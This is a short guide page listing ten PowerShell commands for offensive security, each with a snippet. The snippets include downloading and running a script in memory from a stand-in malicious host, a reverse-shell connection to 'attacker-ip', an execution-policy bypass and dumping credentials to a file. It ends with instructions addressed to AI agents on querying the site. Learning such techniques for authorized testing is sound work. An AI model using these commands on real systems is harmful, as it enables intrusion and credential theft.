# 10 Essential PowerShell Commands for Offensive Security 1. **Invoke-WebRequest**\ Download files from a URL. This can be used to pull malicious payloads. ```powershell Invoke-WebRequest -Uri "http://malicious-site.com/payload.exe" -OutFile "payload.exe" ``` 2. **Invoke-Expression (IEX)**\ Execute strings or scripts, often used for fileless attacks by downloading and running scripts in memory. ```powershell IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/script.ps1') ``` 3. **Set-ExecutionPolicy**\ Change the execution policy to allow running scripts. Useful when bypassing script execution restrictions. ```powershell Set-ExecutionPolicy Bypass -Scope Process -Force ``` 4. **Get-WmiObject**\ Gather detailed information about the target machine, including OS details, hardware specs, and processes. ```powershell Get-WmiObject -Class Win32_OperatingSystem ``` 5. **Get-Process**\ List all running processes. Often used for identifying running services or processes that can be exploited. ```powershell Get-Process ``` 6. **Start-Process**\ Execute a process on the target machine, useful for starting a new payload or running privilege escalation techniques. ```powershell Start-Process "cmd.exe" -ArgumentList "/c whoami" ``` 7. **New-Object System.Net.Sockets.TCPClient**\ Create a reverse shell by opening a TCP connection. ```powershell $client = New-Object System.Net.Sockets.TCPClient("attacker-ip", 4444) ``` 8. **Get-Content**\ Read the contents of a file. It can be used for exfiltrating sensitive data. ```powershell Get-Content "C:\sensitive-data.txt" ``` 9. **Out-File**\ Write data to a file. Useful for saving stolen credentials or logs. ```powershell Get-Credential | Out-File "credentials.txt" ``` 10. **Add-Type**\ Inject C# code directly into PowerShell, enabling the use of advanced .NET functionalities or custom code execution. ```powershell Add-Type -TypeDefinition @" public class Exploit { public static void Run() { // malicious code } } "@ [Exploit]::Run() ``` > **Note:** The usage of these commands is for educational and authorized testing purposes only. Always ensure you have permission before engaging in offensive security activities. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cvb.gitbook.io/guides.christianvonbredow/powershell/10-essential-powershell-commands-for-offensive-security.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.